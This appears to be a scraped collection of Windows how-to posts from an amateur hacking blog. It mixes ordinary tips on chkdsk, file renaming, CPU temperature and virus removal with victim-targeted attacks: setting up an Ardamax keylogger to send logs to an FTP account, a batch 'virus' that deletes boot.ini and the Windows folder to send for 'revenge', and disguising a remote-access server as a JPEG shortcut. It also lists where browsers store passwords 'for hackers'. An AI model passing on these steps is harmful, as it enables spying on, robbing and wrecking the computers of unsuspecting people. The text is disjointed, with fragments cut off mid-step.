Goto Start–>Run.

Type msconfig and hit Enter.
Navigate to Startup tab.

2. Fixing Hard Disk Errors
Hard disk error occurs mainly due to improper shutdown.Its also one of the main reason which makes windows to take long time to load.
Goto Start –> Run.
Type CMD and hit enter.
Type chkdsk and hit enter.
It Check disk command checks error in HDD and fixes it.
Now fix errors in other drives. D,E,F,G,H,….
Type CHKDSK /F for drives other than C and fix HDD error.

1. What is a Keylogger?
A keylogger is also called a spysoftware is a small program that records each and every...keystroke a user types on a specific computer’s keyboard. A keylogger program canb e installed or attached in computer just in a few seconds and once installed you are only a step away from getting the victim’s password.

2. How Keylogger works?
Once the keylogger is installed on a PC, it starts operating in the background (stealth mode) and captures every keystroke of the victim on that PC. Let’s take up a small example: The victim goes to http://www.gmail.com and types his “username” and the “password” in the respective fields to login. The keylogger silently records these keystrokes and stores them in the logs. These logs when opened up shows the captured “username” and “password” and will also tell you that they were typed in the gmail login page. Thus the keylogger loads upon every startup, runs in the background and captures each and every keystroke. Some keyloggers also give a screen-shot of Your computer background.

3-Types of Keyloggers.
1-Hardware Keylogger - A plug-in device or a hardware circuit can be used as keylogger tools. Either of the two can log to their internal memories all of a user’s keyboard activities.
2-Software Keylogger- The software keylogger needs to be installed on the Victims computer to work

4-Once I install the keylogger can the victim come to know about it’s presence?
No. The victim will never come to know about the presence of the keylogger on his/her computer. This is because, once installed the keylogger will run in total stealth mode. 2-.Now right-hand click it and click ‘Enter registration key….

3-Enter the Name and password in the box fields

II. Creating the Keylogger Remote file:
1. Now your going to make the Keylogger Remote file (The thing you give to your victim). Click ‘Remote Installation…’,

click ‘Next’

3.If you want to bind Keylogger Remote file with another application or file click the box that says ‘Append keylogger Remote file to file or another application’ and browse file or application that you want to bind it with.. I would prefer to skip this and bind the keylogger after creating the remote file.

10. Now you should be at ‘FTP’, create a free account at http://www.drivehq.com/secure/FreeSignup…om=storage, then make sure your at ‘Online Storage’, then make a new folder called: Logs (this is where the logs are sent to when you keylogg someone), Now on your FTP on Ardamax Keylogger, where it says ‘FTP Host:’, put this:

Now where it says ‘Remote Folder:’, put this: Logs
Now where it says ‘Userame:’ and ‘Password:’, put your DriveHQ username and password, then it should look something like this:

Now Click ‘Test’ and it should pop up like this

If not then see if the password and username is right.

Once done, do NOT change your DriveHQ password or rename/delete the folder called ‘Logs’, if you do, the logs will not come through.

11. You should now be at ‘Control’, un-tick ‘Enable Screenshots Capturing’ then click ‘Next’.

12. Now you can change name and icon your Keylogger Engine as you want it to look like.

Yes Now it is possible for you to have your own virus. But before doing anything yourself first of all you need to read the whole article first. And let me remind you that any problem occurs after you do anything then you are solely responsible for what has happened and I will not be responsible.
First of all Open your notepad and type the following………
del c:\boot।ini c:\del autoexec.bat
Now Save as anyname.exe. Create this in C: drive
The only thing you need is Notepad.

Create a text file called TEST.txt(empty) in C:\
Now in your notepad type “erase C:\TEST.txt” (without the quotes). Then save it as “Test.cmd”.
Now run the file “Test.cmd”go to C:\ and you’ll see your Test.txt is gone.

Now, the real work :

Go to Notepad and type erase C:\WINDOWS and save it as findoutaname.cmd.
Now DON’T Run the file or you’ll lose your WINDOWS map.

So, that’s the Virus. In this way you can make a virus to delete any file you want.
Now to take revenge. Send you file to your victim. Once victim opens it. WINDOWS map is Deleted. And he will have to install WINDOWS again.

Disable Window Logo Key

Sometimes while playing games, this nasty Window Key keep annoyed us, cause we often clicked it.
So if u people don't wanna get annoyed with this key then u just need to disable it.
Disabling the Window Logo Key requires u to play with Registry Editor.
All u just need to do is to open a notepad and save the code given below and save it as *.reg
So when next time u don't wanna use Window Key, just double click on this file. Code:-

Remove new folder.exe virus

Remove New Folder Virus regsvr.exe virus, or as new folder.exe virus
This virus is know popularly as regsvr.exe virus, or as new folder.exe virus and most people identify this one by seeing autorun.inf file on their pen drives, But trend micro identified it as WORM_DELF.FKZ. It is spreading mostly using pen drives as the medium.
Well, so here is the story of how i was able to kill the monster and reclaim my hard disk space.
Manual Process of removal
I prefer manual process simply because it gives me option to learn new things in the process.
So let’s start the process off reclaiming the turf that virus took over from us.

1.Cut The Supply Line :
a. Search for autorun.inf file. It is a read only file so you will have to change it to normal by right clicking the file , selecting the properties and un-check the read only option
b. Open the file in notepad and delete everything and save the file.
c. Now change the file status back to read only mode so that the virus could not get access again.
d. Click start->run and type msconfig and click ok
e. Go to startup tab look for regsvr and uncheck the option click OK.
f. Click on Exit without Restart, cause there are still few things we need to do before we can restart the PC.
g. Now go to control panel -> scheduled tasks, and delete the At1 task listed

2.Open The Gates Of Castle :
a. Click on start -> run and type gpedit.msc and click Ok.
c. If you are Windows XP Home Edition user you might not have gpedit.msc in that case download and install it from Windows XP Home Edition: gpedit.msc
d. Go to users configuration->Administrative templates->system
e. Find “prevent access to registry editing tools” and change the option to disable.
f. Once you do this you have registry access back.

3.Launch The Attack At Heart Of Castle :
a. Click on start->run and type regedit and click ok
b. Go to edit->find and start the search for regsvr.exe,
c. Delete all the occurrence of regsvr.exe; remember to take a backup before deleting. DO NOT FORGET that regsvr32.exe is not to be deleted. Delete regsvr.exe occurrences only.
d. At one ore two places you will find it after explorer.exe in theses cases only delete the regsvr.exe part and not the whole part. E.g. Shell = “Explorer.exe regsvr.exe” the just delete the regsvr.exe and leave the explorer.exe

4.Seek And Destroy the enemy soldiers, no one should be left behind :
a. Click on start->search->for files and folders.
b. Their click all files and folders
c. Type “*.exe” as filename to search for
d. Click on ‘when was it modified ‘ option and select the specify date option
e. Type from date as 1/31/2010 and also type To date as 1/31/2010
f. Now hit search and wait for all the exe’s to show up.
g. Once search is over select all the exe files and shift+delete the files, caution must be taken so that you don’t delete the legitimate exe file that you have installed on 31st January.
h. Also selecting lot of files together might make your computer unresponsive so delete them in small bunches.
i. Also find and delete regsvr.exe, svchost .exe( notice an extra space between the svchost and .exe)

5.Enjoy :
1. Now do a cold reboot (ie press the reboot button instead) and you are done.
I hope this information helps you win your own battle against this virus. Soon all antivirus programs will be able to automatically detect and clean this virus.

Delete An "undeletable" File Manually

Open a Command Prompt window and leave it open.
Close all open programs.
Click Start, Run and enter TASKMGR.EXE
Go to the Processes tab and End Process on Explorer.exe.
Leave Task Manager open.
Go back to the Command Prompt window and change to the directory the AVI (or other undeletable file) is located in.
At the command prompt type DEL where is the file you wish to delete.
Go back to Task Manager, click File, New Task and enter EXPLORER.EXE to restart the GUI shell.
Close Task Manager.
Or you can try this
Open Notepad.exe
Click File>Save As..>
locate the folder where ur undeletable file is
Choose 'All files' from the file type box
click once on the file u wanna delete so its name appears in the 'filename' box
put a " at the start and end of the filename
(the filename should have the extension of the undeletable file so it will overwrite it)
click save,
It should ask u to overwrite the existing file, choose yes and u can delete it as normal
Here's a manual way of doing it. I'll take this off once you put into your first post zain.
1. Start
2. Run
3. Type: command
4. To move into a directory type: cd c:\*** (The stars stand for your folder)
5. If you cannot access the folder because it has spaces for example Program Files or Kazaa Lite folder you have to do the following. instead of typing in the full folder name only take the first 6 letters then put a ~ and then 1 without spaces. Example: cd c:\progra~1\kazaal~1
6. Once your in the folder the non-deletable file it in type in dir - a list will come up with everything inside.
7. Now to delete the file type in del ***.bmp, txt, jpg, avi, etc... And if the file name has spaces you would use the special 1st 6 letters followed by a ~ and a 1 rule. Example: if your file name was bad file.bmp you would type once in the specific folder thorugh command, del badfil~1.bmp and your file should be gone. Make sure to type in the correct extension.

Converting .exe files to .jpg

1. Firstly, create a new folder and make sure that the options ’show hidden files’ is checked and ‘hide extensions for
known file types’ is unchecked. Basically what u need is to see hidden files and see the extension of all your files on
your pc.

2. Paste a copy of your server on the new created folder. let’s say it’s called server.exe
(that’s why you need the extension of files showing, cause you need to see it to change it)

3. Now you’re going to rename this server.exe to whatever you want, let’s say for example picture.jpeg

4. Windows is going to warn you if you really want to change this extension from exe to jpeg, click YES.

5. Now create a shortcut of this picture.jpeg in the same folder.

6. Now that you have a shortcut, rename it to whatever you want, for example, me.jpeg.

7. Go to properties (on file me.jpeg) and now you need to do some changes there.

8. First of all delete all the text on field START IN and leave it empty.

9. Then on field TARGET you need to write the path to open the other file (the server renamed picture.jpeg) so u
have to write this: C:\WINDOWS\system32\cmd.exe /c picture.jpeg

10. The last field, c picture.jpeg is always the name of the first file. If you called the first file soccer.avi you
gotta write C:\WINDOWS\system32\cmd.exe /c soccer.avi got it?

11. So what you’re doing is when someone clicks on me.jpeg, a cmd will execute the other file picture.jpeg and the
server will run.

12. On that file me.jpeg (shortcut), go to properties and you have an option to change the icon. click that and a
new window will pop up and u have to write this: %SystemRoot%\system32\SHELL32.dll . Then press OK.

13. You can set the properties HIDDEN for the first file (picture.jpeg) if you think it’s better to get a connection
from someone.

14. But don’t forget one thing, these 2 files must always be together in the same folder and to get connected
to someone they must click on the shortcut created not on the first file. So rename the files to whatever you want
considering the person and the knowledge they have on this matter.

15. For me for example I always want the shortcut showing first so can be the first file to be opened.
So I rename the server to picture2.jpeg and the shortcut to picture 1.jpeg. This way the shortcut will show up first.
If you set hidden properties to the server (picture.jpeg) then u don’t have to bother with this detail but I’m warning
you, the hidden file will always show up inside of a zip file or rar.

16. So the best way to send these files together to someone is compress them into zip or rar.

17. inside the RAR or ZIP file you can see the files properties and even after all this work you can see that the
shortcut is recognized like a shortcut but hopefully the person you sent this too doesn’t know that and is going to
open it.

Firstly,your internet speed has to be at least 64 kbps or above (which means Dial-up users, who will be having a lot of latency, will not be able to setup) . Secondly,you going to have to have a domain, an updated one with the current IP active.
Download the Shoutcast files and install them in any order.
Now navigate to

START > PROGRAM FILES > SHOUTcast DNAS > EDIT SHOUTCAST DNS CONFIG.

Configuring Shoutcast -

Go Down and where it says Password : change (set it something you can remember..duh.)
The Portbase : change it to whatever port you want it

When you download photos from your digital camera, they often have unrecognizable names. You can rename several similar files at once with the following procedure. This also works for renaming other types of files.

1.Open the My Pictures folder. (Click Start, and then click My Pictures.) Or open another folder containing files that you want to rename.

2.Select the files you want to rename. If the files you want are not adjacent in the file list, press and hold CTRL, and then click each item to select it.

3.On the File menu, click Rename or press F2.

4.Type the new name, and then press ENTER.

All of the files in the series will be named in sequence using the new name you type. For example, if you type Birthday, the first will be named Birthday and subsequent files in the series will be named vnr18_01 (1), vnr18_01 (2), and so on. To specify the starting number for the series, type the starting number in parentheses after the new file name. The files in the series will be numbered in sequence starting with the number you type. For example, if you type vnr18_01(10), the other files will be named vnr18_01 (11), vnr18_01 (12), and so on.

How to check CPU temperature Reasons for Overheating CPU

So there are two basic ways to check the temperature of your system and this is either through the BIOS or using a software application that comes with your motherboard.
Not all motherboards are able to monitor CPU and motherboard temperature's but nowadays most motherboards should be able to.
You are also able to monitor fan speeds in rpm (revolution per minute) and sometimes alter them in order to keep your CPU running at a lower temperature and some motherboards even have a feature that allows you to specify in what temperature range you wish your CPU to run at.

Checking CPU temperature through BIOS So the first way to check your cpu temperature and motherboard temperature (often reffered to as system temperature) you have to enter your systems bios / setup.
Sometimes it can be hard to enter the bios especially when you have a very fast loading computer, so here are the basic steps
1. Upon Startup press DEL to enter SETUP (another name for BIOS) it may differ from motherboard it may be F1 or sometimes F2, if you having trouble seeing what key to press it should tell you at the very bottom of the screen press the PAUSE BREAK key on your keyboard so you pause your screen to take a closer look.
2. Once in BIOS , navigate to your motherboards Power or PC health Menu
3. Here you will see CPU TEMP, SYSTEM TEMP

Checking CPU temperature while in Windows/Linux

So for this method you can check the CD that came with your Motherboard for any software that allows you to check your CPU temperature. For this example I am using an ASUS motherboard which uses the ASUS AI Suite program to monitor CPU temperature, System temp and Clock speeds.
So you can simply install the program from your Motherboard CD, and open the program up which looks like below using the cpu temperature monitoring software

So it is common to find your motherboard does not come with a cpu temperature software application but there are a few free ones out there, below is a list of some free cpu temperature software.
Remember it will only work if your motherboard supports cpu temperature monitoring not all motherboards do so you may need to try out a few cpu temperature software programs to see which one works for you.

Reasons CPU is overheating

It is not uncommon for a CPU to run hot and usually it is quite an easy fix the following are the most common reasons
1. Thermal Paste underneath your CPU has been applied poorly and not in a nice thing layer, if this is the case you can simply go out and buy some more , its very cheap and look for a thermal paste that comes with a brush to make applying it easier.
2. Your CPU needs a desperate clean and is clogged with dust , this is very common in old houses that get dusty easily, simply clean it out with a brush or can of compressed air. My secret method , cheap method is too use a simple manual foot pump for a swisse ball:P works great and cheaper than buying cans of compressed air.
3. You CPU cooling system has not been fitted properly or is generally poor, this being said the stock fan's that come with CPU's are usually adequate aslong as you aren't overclocking or doing anything extreme.

Signs of High Temperature on CPU

Running your CPU constantly at a high temperature can be very damaging and may have the following implications
- Reduce the Life of your CPU
- Randomly Freezes or Resets your computer
- CPU totally burns out (this would take some time, at very high temps to occur, remember intel cpu temperature can get very hot especially prescott series)
Another great way to monitor your cpu temperature is to include desktop widgets to monitor your CPU temp at all times.

Where The Passwords Get stored in Windows Xp and Vista – Must for hackers and beginners

Goto Start Menu.
Click on Run.
Type “regedit” (without quotes) in the Run Box .After that this Windows Opens . Now you are ready to see that.

LOCATIONS OF SAVED PASSWORDS !
FOR INTERNET EXPLORER 4.00 – 6.00

The passwords are stored in a secret location in the Registry known as the “Protected Storage“.

The base key of the Protected Storage is located under the following key:

“HKEY_CURRENT_USER\Software\Microsoft\Protected Storage System Provider“.

You can browse the above key in the Registry Editor (RegEdit), but you won’t be able to watch the passwords, because they are encrypted.

Also, this key cannot easily moved from one computer to another, like you do with regular Registry keys.

FOR INTERNET EXPLORER 7.00 – 8.00
The new versions of Internet Explorer stores the passwords in 2 different locations.

AutoComplete passwords are stored in the Registry under

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\IntelliForms\Storage2.

HTTP Authentication passwords are stored in the Credentials file under

Documents and Settings\Application Data\Microsoft\Credentials
, together with login passwords of LAN computers and other passwords.
FIREFOX

The passwords are stored in one of the following filenames: signons.txt, signons2.txt, and signons3.txt (depends on Firefox version)

These password files are located inside the profile folder of Firefox, in

[Windows Profile]\Application Data\Mozilla\Firefox\Profiles\[Profile Name]
Also, key3.db, located in the same folder, is used for encryption/decription of the passwords.
GOOGLE CHROME WEB BROWSER

The passwords are stored in

[Windows Profile]\Local Settings\Application Data\Google\Chrome\User Data\Default\Web Data
(This filename is SQLite database which contains encrypted passwords and other stuff)
OPERA
The passwords are stored in wand.dat filename, located under
[Windows Profile]\Application Data\Opera\Opera\profile
There are some more application whose password storage you probably want to know, like Outlook Express, Outlook 98/2000, Windows Live Mail, ThunderBird, Google Talk, Google Desktop, Windows Messenger, Yahoo Messenger, AIM, ICQ Lite, Digsby, PaltalkScene. Funny UST Scandal Virus

These Viruses Are Mainly Spreading From The USB Devices Like Pendrive , Mobile Memory Cards etc...

Some of the Symptoms Of Funny UST SCandal.avi.exe
• A orange icon with image of a Foot.
• Files missing, Not able to view hidden files.
• Every time you click on My Computer opens a new instance of it.
• Task Manager automatically disappearing after few seconds, not able to view process.
• System deadly slow
• Installations not occurring.

How To Remove This Virus ?

* Follow These Steps

Download and install TaskKiller. TaskKiller forcefully kills the task and hence stops virus from replicating. Run Task Killer, and a red skull icon will appear on the system tray.Left click it, and click Processes
Select to kill these processes -

killer.exe
lsass.exe
smss.exe

Now open up Command Prompt (Start>Run>command). Type each command and press Enter to run it -

cd\
attrib -h -s smss.exe
attrib -h -s autorun.inf

Open My Computer and go to "C:\", then "C:\Windows\System32" and "C:\Windows\System".
Delete the following files -

smss.exe
autorun.inf

Now, go to C:\Documents and Settings\All users\Startmenu\Programs\Startup and delete the file lsass.exe.

“I Dont hate Mozilla but use IE or Else” Virus

Few days back when i tried to open mozilla firefox i got a message “I Dont hate mozilla but use IE or Else”… this was my first encounter with a virus… My antiVirus couldn’t detect it… thats bad..
My senior Colleague at office Mr. Mohan, he is a person who guides me in all my system related queries. Thanks Mohan. when i said him about this he went through google…. and landed on to a site “mozillaZine” where people discuss about the virus. Thankfully people had already found solution for this virus. Which had blocked my mozilla firefox but IE was accessible. even with IE i was unable to visit orkut.

Disable Autorun Feature

Click Start -> Run.
Type RegEdit in the Open text box, then press ENTER.
In the Registry Editor, locate and click the following registry key:

HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDRom

Modify the value of the Autorun to 0 (zero) so that CD-ROMs and Audio CDs do not run and start automatically when inserted.
Next navigate to the following registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer

Modify the value of the NoDriveTypeAutoRun entry to 0xb5 value to turn off the AutoRun feature for CD-ROMs by right-click NoDriveTypeAutoRun and then click Modify to type B5 in the Value data box. Select Hexadecimal, and then click OK.
Quit Registry Editor.
Restart your computer.

The steps to kill the virus :

Go to Task Manager (Ctrl+Alt+Del)
in that click on Process Tab
Delete only the svchost.exe of your user name
type c:\heap41a in you address barof your explorer and you can trace this folder
Done.
